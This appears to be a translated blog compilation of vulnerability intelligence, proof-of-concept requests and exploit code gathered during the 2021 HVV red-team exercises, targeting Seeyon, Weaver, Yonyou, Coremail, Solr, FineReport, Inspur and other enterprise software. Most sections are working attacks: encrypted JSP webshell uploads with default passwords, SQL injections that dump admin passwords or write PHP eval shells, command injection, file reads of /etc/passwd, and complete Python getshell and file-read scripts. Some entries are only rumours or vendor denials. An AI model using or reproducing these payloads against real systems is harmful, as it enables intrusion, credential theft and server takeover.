Some vulnerabilities and exploitation methods disclosed during HVV 2021 (POC/EXP attached for some)


Wishing that before HVV begins ...


0x01 Seeyon OA arbitrary user login




April 8 security intelligence


April 8, 15:00: a new WPS 0-day exploitation method surfaced; a click triggers RCE through WPS's built-in browser.
April 8, 12:00: reports that the Qizhi bastion host has a command execution vulnerability; a poc has reportedly leaked.
April 8, 12:00: reports circulating online that Sangfor EDR has a command execution vulnerability; poc reportedly leaked.
April 8, 12:00: reports circulating online that Sangfor VPN has an unconditional RCE vulnerability; poc reportedly leaked.
April 8, 12:00: reports circulating online that jackson has a deserialization vulnerability; poc reportedly leaked.
April 8, 12:00: reports circulating online that Coremail has a command execution vulnerability; poc reportedly leaked.
April 8, 12:00: reports circulating online that Yonyou NC 6.5 has a deserialization command execution vulnerability; poc reportedly leaked.
April 8, 12:00: reports circulating online that dubbo has a deserialization command execution vulnerability; poc reportedly leaked.
April 8, 12:00: reports circulating online that weblogic has a deserialization command execution vulnerability; poc reportedly leaked.
April 8, 11:00: reports circulating online that all versions of the Hexin Chuangtian cloud desktop system have command execution and file upload vulnerabilities; poc leaked.
April 8, 11:00: reports circulating online of a Hongfan OA arbitrary file write vulnerability; poc reportedly leaked.
April 8, 11:00: reports circulating online that exchange, Seeyon and shiro have 0-day vulnerabilities; exploitation methods reportedly leaked.
April 8, 11:00: reports circulating online that all versions of Kingdee K3Cloud have command execution; poc reportedly leaked.
April 8, 11:00: reports circulating online that Yonyou U8Cloud has command execution; poc reportedly leaked.
April 8, 11:00: reports circulating online that the 2016 edition of the H3C computing management platform allows arbitrary account creation; poc reportedly leaked.
April 8, 11:00: reports circulating online that the Venustech Tianqing Hanma USG firewall has a logic flaw; poc reportedly leaked.
April 8, 10:00: reports that Tianyan (SkyEye) has a 0-day vulnerability; poc leaked.


0x02 dzzoffice front-end (unauthenticated) RCE


Project


https://github.com/zyx0814/dzzoffice/releases/


Prerequisite


First you need to obtain the authkey, which can be obtained by brute force or other means; for the specifics see the article.


The key in my current environment is: 3090dfHwzmw9lsC3


Encryption script



```php
<?php
// dzzoffice's authcode routine (RC4-style keystream derived from the site key),
// used here to produce the encrypted "path" value for the request below.
function authcode_config($string, $key, $operation = 'DECODE', $expiry = 0)
{
    $ckey_length = 4;
    $key  = md5($key);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length
        ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length))
        : '';
    $cryptkey   = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE'
        ? base64_decode(substr($string, $ckey_length))
        : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    // key scheduling
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    // keystream generation and XOR
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'DECODE') {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0)
            && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}

echo base64_encode(authcode_config("disk::..././..././..././shell.php", md5('3090dfHwzmw9lsC3'), 'ENCODE'));
```


Encrypted output (shown as a screenshot in the original)




Construct the request:



```http
POST /core/api/wopi/index.php?access_token=1&action=contents&path=ZmM0OWp3bDgxbDE3WlhocFlCVUl4ZDFvRkNYeDRVaGtQbklJYlVSUjV2VjRzLzBwUkJ0Y051ZHl4QzVITFlvN205cENqZktDY1lyNHRQQ0pWblU= HTTP/1.1
Host: word.com
Content-Length: 18
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://word.com
Referer: http://word.com/user.php?mod=login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<?php phpinfo();?>
```

April 9 security intelligence


0x03 Jellyfin arbitrary file read



```http
GET /Audio/anything/hls/..datajellyfin.db/stream.mp3/ HTTP/1.1
GET /Videos/anything/hls/m/..datajellyfin.db HTTP/1.1
GET /Videos/anything/hls/..datajellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1
```

0x04 FanRuan FineReport V9 getshell [historical vulnerability]


FineReport V9


Note: this vulnerability is an arbitrary file overwrite; to upload a JSP shell you need to find an existing jsp file to overwrite.


JSP files present by default under Tomcat after FineReport starts:


For example: /tomcat-7.0.96/webapps/ROOT/index.jsp


Overwrite index.jsp in Tomcat's built-in ROOT directory:



```http
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: 192.168.169.138:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Connection: close
Accept-Au: 0c42b2f264071be0507acea1876c74
Content-Type: text/xml;charset=UTF-8
Content-Length: 675

{"__CONTENT__":"<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null) {String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>","__CHARSET__":"UTF-8"}
```

0x05 Weaver OA 8 front-end SQL injection


POC


http:


Use the payload to query the sysadmin password from the database


```
Select password as id from HrmResourceManager
http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
```




0x06 Weaver OA 9 front-end unrestricted getshell


Vulnerable location:


/page/exportImport/uploadOperation.jsp




File upload location:


view-source:http:




wiki POC

Link: https://github.com/PeiQi0/PeiQi-WIKI-POC/commit/f5fb98b0cc2c9dcc9b8adce41479cf836265419a



```http
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 397
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
dnt: 1
x-forwarded-for: 127.0.0.1
Connection: close

------WebKitFormBoundary6XgyjB6SeCArD3Hc
Content-Disposition: form-data; name="file"; filename="peiqi.jsp"
Content-Type: application/octet-stream

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundary6XgyjB6SeCArD3Hc--
```
Path: /page/exportImport/fileTransfer/peiqi.jsp
Default password: rebeyond

0x07 Hexin Chuangtian remote desktop command execution



```http
POST /Upload/upload_file.php?l=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 164

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/avif

1
------WebKitFormBoundaryfcKRltGv--
```



0x08 Moan honeypot management platform unauthorized access [officially denied]


Vulnerability information


Huanzhen (幻阵) is Moan Technology's threat detection and defense system built on attack obfuscation and deception defense technology. Because authentication on the honeypot management platform is incomplete, an attacker could access the management page without authorization. Moan published an official notice stating that the Huanzhen management platform sits on an intranet address that is hard for attackers to reach, and that even with access one could only make Huanzhen execute a ping command, so it poses no security risk.


Impact


Because authentication on the honeypot management platform is incomplete, an attacker could access the management page without authorization.


Official denial


Moan Technology has noticed false claims circulating in the industry that "the Moan Huanzhen management back end has an authentication bypass vulnerability" and issues the following statement.




0x09 Tianqing unauthorized access [officially denied]


POC


GET /api/dbstat/gettablessize HTTP/1.1


Official: Intelligence leaked during the recent HVV period claimed that the web login page, before login, shows a notice that includes the user's organization, the expiry time of function-module licenses, and so on. Tianqing published a statement saying the web interface is a normal interface and not a vulnerability.


0x10 Tianqing front-end SQL injection vulnerability [historical vulnerability]


PoC


```
https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<target file write path>';drop table O;--
```


Exploitation method


It first creates a new database table, then dumps the table contents to the webshell's target file name, and finally drops the table to clean up traces.


Official statement


This vulnerability was a known internal issue and was already fixed in the release before the 2020 HVV exercise.


0x11 Topsec data leakage prevention system (LDP) unauthorized admin password change [historical vulnerability]


Vulnerability information:


Topsec data leakage prevention system unauthorized admin password change; this intelligence was received on August 17, 2020, and is not a vulnerability from the recent HVV period.


POC


The default user superman has uid=1
POST  /?module-auth_user&action=mod_edit.pwd HTTP/1.1




0x11 Landray OA arbitrary write vulnerability


POC


/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]


0x12 ZenTao 11.6 SQL injection [historical vulnerability]


Vulnerability information


Version 11.6 has a SQL injection vulnerability; it is an N-day, not a 0-day from the HVV period.


Verification


The injection stems from ZenTao's use of pathinfo routing, in the following URL


http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user


The path is parsed as


getModel-<model name>-<method name>-<parameter name>=<parameter value>


0x13 Apache Solr arbitrary file read vulnerability [historical vulnerability]


Vulnerability information


The vulnerability exists because Apache Solr does not enable authentication in a default installation: an unauthenticated attacker can use the Config API to turn on the requestDispatcher.requestParsers.enableRemoteStreaming switch, then send crafted requests that perform SSRF and read arbitrary files from the target server.


Affected versions


Apache Solr <= 8.8.1


POC


http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd  (db is an existing core name)


POC2


http://ip//solr/db/debug/dump?param=ContentStreams (db is an existing core name)
POST body: stream.url=file:///etc/passwd




```python
import requests
import json
import argparse

TIMEOUT = 20


def run(target: str, action: str):
    # Enumerate cores through the admin API, then use the first core found
    try:
        admin_url = target + "/solr/admin/cores?indexInfo=false&wt=json"
        response = requests.get(admin_url, verify=False, timeout=TIMEOUT)
        if response.status_code == 200 or "name" in response.text:
            data = json.loads(response.content)
            for i in data["status"]:
                key = data["status"][i]["name"]
                return attack(key, target, action)
    except Exception as e:
        error = "[-] {} run error:{}".format(target, str(e))
        raise RuntimeError(error)
    return None


def attack(core_name: str, target: str, action: str):
    session = requests.session()
    # Step 1: flip enableRemoteStreaming through the unauthenticated Config API
    config_url = target + "/solr/" + core_name + "/config"
    json_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": "true"}}
    response = session.post(config_url, data=json.dumps(json_data), timeout=TIMEOUT)
    if response and 200 != response.status_code:
        return None
    # Step 2: ask debug/dump to fetch the remote stream (file:// or http://)
    dump_url = target + "/solr/" + core_name + "/debug/dump?param=ContentStreams"
    dump_data = {"stream.url": action}
    response = session.post(dump_url, data=dump_data, timeout=TIMEOUT)
    if response is None:
        return None
    elif 200 == response.status_code:
        content = json.loads(response.text)
        return content['streams'][0]['stream']
    elif 500 == response.status_code:
        return response.text
    else:
        return None


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Solr arbitrary file download PoC.')
    parser.add_argument('-u', "--url", help='solr attack target', required=True)
    parser.add_argument('-a', '--action', help='file or url', required=True)
    args = parser.parse_args()
    print("[+] check {} ,action:get {}".format(args.url, args.action))
    result = run(args.url, args.action)
    if result is None:
        print("[-] Not found vuln")
    print("[+] The result is as follows:\n{}".format(result))
```

0x14 Apache Solr SSRF (server-side request forgery)


Affected versions


Apache Solr < 8.8.2


POC


/solr/db/replication?command=fetchindex&masterUrl=http://xxxx


Reference


https://github.com/keven1z/SolrfilereadPOC


0x15 Seeyon OA ajax.do file upload vulnerability [historical vulnerability]


Vulnerability information


Certain interfaces in older Seeyon OA versions have an authorization bypass: with specially crafted HTTP requests an attacker can bypass the interface's permission mechanism and, combined with certain interface functions, upload malicious files without authorization and take control of the target host. On verification, this is a historical vulnerability from the October to December 2020 security bulletin that Seeyon published on December 29, 2020.


Affected versions


Seeyon OA V8.0
Seeyon OA V7.1, V7.1SP1
Seeyon OA V7.0, V7.0SP1, V7.0SP2, V7.0SP3
Seeyon OA V6.0, V6.1SP1, V6.1SP2
Seeyon OA V5.x


POC



```http
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded

managerMethod=validate&arguments=<gzip-compressed, URL-encoded payload blob omitted>
```

Behinder 3 default jspx shell password: rebeyond


webshell address: http://xxx.xxx.xxx.xxx/seeyon/mmd.jspx


Response on success


HTTP/1.1 500

{
"message":null,
"code":"0614448583",
"details":null
}


0x16 EYou mail system remote command execution


Reference: https://github.com/Tas9er/EYouMailRCE


Tool: EYouMailRCE-master.zip


POC



```http
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: 192.168.10.1
Content-Length: 25
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0
Connection: close

type='|cat /etc/passwd||'
```

0x17 Other vulnerability information


1. MyBB SQL injection vulnerability (CNVD-2021-25709) [confidence 100%]
MyBB is a free, open-source forum software. Versions before MyBB 1.8.26 have a SQL injection vulnerability in theme properties.
3. Yonyou NC 1-day deserialization [confidence 100%]
Yonyou NC is world-class high-end management software for group enterprises. An arbitrary file upload vulnerability was found, and deserialization can be executed through the apache commons-collections library.
4. Phishing emails [confidence 100%]
From network intelligence: phishing emails were found containing a malicious Excel file; opening the file can lead to remote control and other threats. Verified by ThreatBook.
        1) Block IP 192.31.96.152;
        2) Watch for the malicious sender suffix @rainmetal.cn and do not open emails sent from that suffix.
5. Hexin Chuangtian cloud desktop command execution / arbitrary file upload [confidence 60%]
Hexin's next-generation cloud desktop system (VENGD) is a leading domestic desktop virtualization product based on the NGD architecture. It combines the advantages of the VDI, VOI and IDV architectures to achieve hybrid front-end/back-end computing, making full use of front-end resources while scheduling back-end server compute. Beyond mobile office from anywhere, it delivers 3D high-definition playback and full peripheral hardware compatibility over narrow-bandwidth links, meeting the management, security and operations needs of large terminal fleets. The Hexin Chuangtian cloud desktop is suspected to have an arbitrary file upload vulnerability.
7. DZZOFFICE latest version RCE [confidence 100%]
DzzOffice is an open-source cloud storage and application management tool, mainly used by enterprises to manage cloud storage space from Alibaba Cloud, Amazon and others and to allocate that space visually to members. An RCE was found in the latest version; on verification, the bz parameter has a SQL injection vulnerability.
8. Sangfor and Seeyon OA file upload vulnerability intelligence [confidence 60%]
This is network intelligence with no details available for verification yet.
9. F5 BIG-IP 16.0.x iControl REST remote code execution [confidence 100%]
F5 BIG-IP is an application delivery platform from the US company F5 that integrates network traffic management, application security management, load balancing and other functions. F5 BIG-IP has a security vulnerability that allows an unauthenticated attacker with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services.
10. Memory leak vulnerability in multiple HUAWEI products [confidence 100%]
Huawei IPS Module and the others are products of Huawei (China). Huawei IPS Module is an intrusion prevention system (IPS) module. NGFW Module is a next-generation firewall (NGFW) module. Secospace USG6600 is a next-generation firewall product. Multiple Huawei products have a memory leak vulnerability: because the products handle memory release improperly in certain scenarios, a remote attacker may send specific packets to trigger it. Successful exploitation may cause service abnormality.
11. Tongda OA V11.7 online arbitrary user login [confidence 100%]
Tongda OA V11.7 has an arbitrary user login vulnerability. It requires an administrator to be online before the system can be logged into; the other aspect is that the online 瀈濼濷 value is compiled and checked.
12. CVE-2021-21975: vRealize Operations Manager SSRF [confidence 100%]
On March 31, 2021, VMware published risk advisory VMSA-2021-0004 for CVE-2021-21975 and CVE-2021-21983, severity high, score 8.6. CVE-2021-21975: a malicious actor with network access to the vRealize Operations Manager API can perform a server-side request forgery attack to steal administrative credentials.


April 10 security intelligence


0x18 Yonyou NC deserialization exploitation


Vulnerability focus


/service/~xbrl/XbrlPersistenceServlet


EXP


```python
import requests
import threadpool
import urllib3
import sys
import base64

ip = ""
# dnslog: convert the string to hex and replace this segment; ceye.io, used for testing, echoes back
dnslog = "\x79\x37\x64\x70"
data = "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" + dnslog + "\x3a\x38\x30\x74\x00\x00\x74\x00\x0e" + dnslog + "\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f" + dnslog + "\x3a\x38\x30\x78"
uploadHeader = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http:
print(req.text)
```


0x19 Yonyou NC collaborative management software directory traversal vulnerability


Vulnerability focus


/NCFindWeb?service=IPreAlertConfigService&filename=


0x20 Kingsoft endpoint security system V8 default credentials


Default credentials


admin/admin


0x21 Kingsoft endpoint security system V8/V9 file upload vulnerability


Vulnerability focus


dzz/shares/index.php


0x22 Qizhi bastion host (certain versions) arbitrary user login


Vulnerability focus


/audit/gui_detail_view.php


Fofa


app="齐治科技-堡垒机"


POC


/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm


0x23 Coremail mail system arbitrary file upload vulnerability [historical vulnerability]


Impact:


A specific version range has an arbitrary file upload vulnerability; an attacker can upload a webshell, resulting in remote code execution.


Affected versions


Coremail <= XT5.x


Reproduction:


Verified using the POC circulating online: https://github.com/xiaoshu-bit/CoreMailUploadRce


```shell
pip3 install -r requirements.txt
python3 coremail_upload.py -u http://127.0.0.1:1111
```


File upload poc:



```http
POST /webinst/action.jsp HTTP/1.1
Host: 120.136.129.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Connection: close

func=checkserver&webServerName=127.0.0.1:6132/%[email protected]/home/coremail/web/webapp/justtest.jsp%20JUSTTEST
```


Uploaded file location: http://ip:port/coremail/justtest.jsp

0x24 Apache Struts2 patch bypass 0-day (actually S2-052) [no POC]


Affected versions


2.1.1 through 2.3.x before 2.3.x, and 2.5.x before 2.5.13


Vulnerability focus:


com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource


Original exp



```xml
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>calc.exe</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>
```

0x25 Other information


April 10, 09:00: reports circulating online of remote command execution in OneBl** <= v2.2.1; poc leaked


CVE-2021-24086, Windows TCP/IP denial-of-service vulnerability: a POC has been made public

Chrome command execution (requires the Google sandbox to be disabled; a sandbox bypass cannot be ruled out) //https://www.cnblogs.com/KHZ521/p/14654233.html


April 11 to April 12 security intelligence


0x26 Inspur ClusterEngine V4.0 arbitrary command execution


Vulnerability focus


/alarmConfig


fofa_dork


title="TSCEV4.0"


POC


Address: https://github.com/xiaoshu-bit/ClusterEngineRce



```shell
pip3 install -r requirements.txt
python3 clusterengine_poc.py -u http://127.0.0.1:1111
```


```python
from urllib.parse import urljoin

# Method taken from a scanner plugin class: `req` and `log` are that
# framework's request and logging helpers, `self.scan_info` its per-target state.
def verify(self, first=False):
    target = self.scan_info['Target']
    verbose = self.scan_info['Verbose']
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # A single unbalanced quote in the password is enough to provoke the shell syntax error
    payload = "op=login&username=asd&password=asd'"
    try:
        url = urljoin(target, '/login')
        resp = req(url, 'post', data=payload, headers=headers, verify=False)
        if ('{"err"' in resp.text) and (" syntax error: unexpected end of file" in resp.text):
            log.highlight("found Inspur ClusterEngine v4.0 Remote Code Execution")
            self.scan_info['Success'] = True
            self.scan_info['Ret']['VerifyInfo']['URL'] = url
            self.scan_info['Ret']['VerifyInfo']['Payload'] = payload
            self.scan_info['Ret']['VerifyInfo']['method'] = "POST"
            return
    except Exception as e:
        log.info("[*]Request to target URL fail! {}".format(e))
```




0x27 Seeyon OA session leak && arbitrary file upload vulnerability


Description


In Seeyon OA, a specially crafted request yields a session; a webshell is then uploaded through the file upload interface to control the server.


fofa


title="致远"


Reproduction


First comes a vulnerability that obtains an admin cookie. Then an archive is uploaded and extracted, achieving getshell.


```http
POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: *
```


Upload the archive


```http
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host: 192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: *
```


Then extract it


```http
POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: *
```


getshell script



```python
# coding: utf-8
import requests
import re
import time

proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}


def seeyon_new_rce(targeturl):
    orgurl = targeturl
    # Obtain an administrator-privileged cookie directly through this request
    targeturl = orgurl + 'seeyon/thirdpartyController.do'
    post = {"method": "access",
            "enc": "TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4",
            "clientPath": "127.0.0.1"}
    response = requests.post(url=targeturl, data=post, proxies=proxy, timeout=60, verify=False)
    rsp = ""
    if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
        cookies = response.cookies
        cookies = requests.utils.dict_from_cookiejar(cookies)
        # Upload the archive
        aaa = cookies['JSESSIONID']
        print(aaa)
        targeturl = orgurl + 'seeyon/fileUpload.do?method=processUpload'
        files = [('file1', ('11.png', open('1.zip', 'r'), 'image/png'))]
        print()
        headers = {'Cookie': "JSESSIONID=%s" % aaa}
        data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0',
                'isEncrypt': "0"}
        response = requests.post(url=targeturl, files=files, data=data, headers=headers, proxies=proxy,
                                 timeout=60, verify=False)
        if response.text:
            # Pull the file id out of the upload response
            reg = re.findall(r'fileurls=fileurls\+","\+\'(.+)\'', response.text, re.I)
            print(reg)
            if len(reg) == 0:
                exit("匹配失败")
            fileid = reg[0]
            # Ask the portal designer to unpack the uploaded archive
            targeturl = orgurl + 'seeyon/ajax.do'
            datestr = time.strftime('%Y-%m-%d')
            post = ('method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment'
                    '&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + fileid + '%22%5D')
            # headers = {'Cookie': cookies}
            headers['Content-Type'] = "application/x-www-form-urlencoded"
            response = requests.post(targeturl, data=post, headers=headers, proxies=proxy, timeout=60, verify=False)
            print(response.text)


seeyon_new_rce("https://baidu.com/")
```


Shell path: /seeyon/common/designer/pageLayout/a2345678.jsp


0x28 Qi An Xin (Netkang) next-generation firewall RCE


Vulnerable location


/directdata/direct/router


POC



```http
POST /directdata/direct/router HTTP/1.1
Host: 192.168.10.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A
Content-Type: application/x-www-form-urlencoded
Content-Length: 160

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/1.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
```



0x29 Other information


April 12, 14:00: a remote command execution vulnerability was newly discovered in the Tianqing endpoint security management system console; poc reportedly leaked
April 12, 12:00: a binary vulnerability was newly discovered in Xunlei (Thunder) 11
April 12, 12:00: reports of a PHP zerodiMQ backdoor vulnerability; poc leaked
April 12, 10:00: reports of a fastjson 1.2.75 bypass RCE vulnerability; poc reportedly leaked


April 13 to April 21


0x30 D-Link DCS series camera account/password disclosure


fofa


app="D_Link-DCS-2530L"


POC


/config/getuser?index=0


0x31 HIKVISION streaming media management server back-end arbitrary file read


Fofa


title="流媒体管理服务器"


POC


http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini




